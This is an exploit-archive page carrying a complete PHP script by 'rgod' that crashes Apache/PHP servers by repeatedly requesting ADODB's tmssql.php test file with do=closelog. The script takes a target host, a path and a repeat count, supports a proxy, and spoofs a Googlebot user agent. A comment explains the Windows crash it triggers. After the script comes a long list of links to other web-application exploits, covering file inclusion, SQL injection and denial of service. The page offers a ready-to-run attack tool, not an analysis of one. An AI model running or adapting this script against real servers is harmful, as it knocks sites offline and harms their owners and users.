Eklenme Tarihi: 2008-10-20 23:05
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "ADODB tmssql.php Denial of service\r\n";
echo "by rgod [email]rgod@autistici.org\r\n";[/email]
echo "site:
http://retrogod.altervista.org\r\n\r\n";
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path redo OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
echo "path: path to ADODB\r\n";
echo "redo: how many times?\r\n";
echo "Options:\r\n";
echo " -p[port]: specify a port other than 80\r\n";
echo " -P[ip:port]: specify a proxy\r\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." localhost /some_app/ 9999999\r\n";
echo "php ".$argv[0]." localhost /some_app/ 9999999 -p81\r\n";
echo "php ".$argv[0]." localhost /some_app/ 9999999 -P1.1.1.1:80\r\n";
die;
}
/*
tested against Apache/1.3.27 (Win32) PHP/4.3.3
closelog() func close the connection to the system logger, but if its handle
is never initialized, Windows exception is raised by the php4ts.dll
module at address 0x00000000100bf014.
By sending multiple requests to the tmssql.php script, which allow
execution of an arbitrary function without arguments, this will cause
the Apache process to crash and to consume a large amount of memory
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port."\r\n";
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';
}
}
fputs($ock,$packet);
fclose($ock);
}
$host=$argv[1];$path=$argv[2];$redo=$argv[3];
$port=80;$proxy="";
for ($i=4; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
for ($i=1; $i<=$redo; $i++)
{
$packet ="GET ".$p."include/adodb/tests/tmssql.php?do=closelog HTTP/1.0\r\n";
$packet.="User-Agent: Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
echo $packet;
}
?>
Keywords:
Benzer Sayfalar (Similar Pages):
Bulunamadı. (not found)
Bu Sayfalarda İlginizi Çekebilir (The Links Bellow May Attract You As Well):
Exploit /
Web Apps Exploit /
WordPress Blog HTTP Splitting VulnerabilityExploit /
Web Apps Exploit /
QWikiwiki Directory Traversal VulnerabilityExploit /
Web Apps Exploit /
vBulletin LAST.PHP SQL Injection VulnerabilityExploit /
Web Apps Exploit /
PHP mcNews <= 1.3 (skinfile) Remote File Include VulnerabilityExploit /
Web Apps Exploit /
AwStats <= 6.4 Denial Of Service (with Advisory)Exploit /
Web Apps Exploit /
Guppy <= 4.5.11 (Delete Databases) Remote Denial of Service ExploitExploit /
Web Apps Exploit /
Light Weight Calendar 1.x (date) Remote Code Execution VulnerabilityExploit /
Web Apps Exploit /
osCommerce <= 2.2 (extras) Source Code Disclosure VulnerabilityExploit /
Web Apps Exploit /
Sire 2.0 (lire.php) Remote File Inclusion/Arbitary File Upload VulnerabilityExploit /
Web Apps Exploit /
Autonomous LAN Party <= 0.98.1.0 Remote File Inclusion VulnerabilityExploit /
Web Apps Exploit /
ADODB < 4.70 (PhpOpenChat 3.0.x) Server.php SQL Injection ExploitExploit /
Web Apps Exploit /
phpMyAgenda <= 3.0 Final (rootagenda) Remote Include VulnerabilityExploit /
Web Apps Exploit /
Limbo CMS <= 1.0.4.2 (sql.php) Remote File Inclusion VulnerabilityExploit /
Web Apps Exploit /
MyEvent <= 1.3 (myevent_path) Remote File Inclusion VulnerabilityExploit /
Web Apps Exploit /
ezUserManager <= 1.6 Remote File Inclusion VulnerabilityExploit /
Web Apps Exploit /
Squirrelcart <= 2.2.0 (cart_content.php) Remote Inclusion VulnerabilityExploit /
Web Apps Exploit /
TR Newsportal <= 0.36tr1 (poll.php) Remote File Inclusion VulnerabilityExploit /
Web Apps Exploit /
Php Blue Dragon CMS <= 2.9 Remote File Include VulnerabilityExploit /
Web Apps Exploit /
Foing <= 0.7.0 (phpBB) Remote File Inclusion VulnerabilityExploit /
Web Apps Exploit /
pafileDB <= 2.0.1 (mxBB/phpBB) Remote File Inclusion VulnerabilityExploit /
Web Apps Exploit /
ActualAnalyzer Server <= 8.23 (rf) Remote File Include VulnerabilityExploit /
Web Apps Exploit /
EQdkp <= 1.3.0 (dbal.php) Remote File Inclusion VulnerabilityExploit /
Web Apps Exploit /
ACal <= 2.2.6 (day.php) Remote File Inclusion VulnerabilityExploit /
Web Apps Exploit /
VP-ASP 6.00 (shopcurrency.asp) Remote SQL Injection VulnerabilityExploit /
Web Apps Exploit /
TotalCalendar <= 2.30 (inc) Remote File Include VulnerabilityExploit /
Web Apps Exploit /
PrideForum 1.0 (forum.asp) Remote SQL Injection VulnerabilityExploit /
Web Apps Exploit /
qjForum (member.asp) SQL Injection VulnerabilityExploit /
Web Apps Exploit /
Plume CMS <= 1.0.3 (manager_path) Remote File Include VulnerabilityExploit /
Web Apps Exploit /
DoceboLMS <= 2.0.5 (help.php) Remote File Include VulnerabilityExploit /
Web Apps Exploit /
V-Webmail <= 1.6.4 (pear_dir) Remote File Include Vulnerability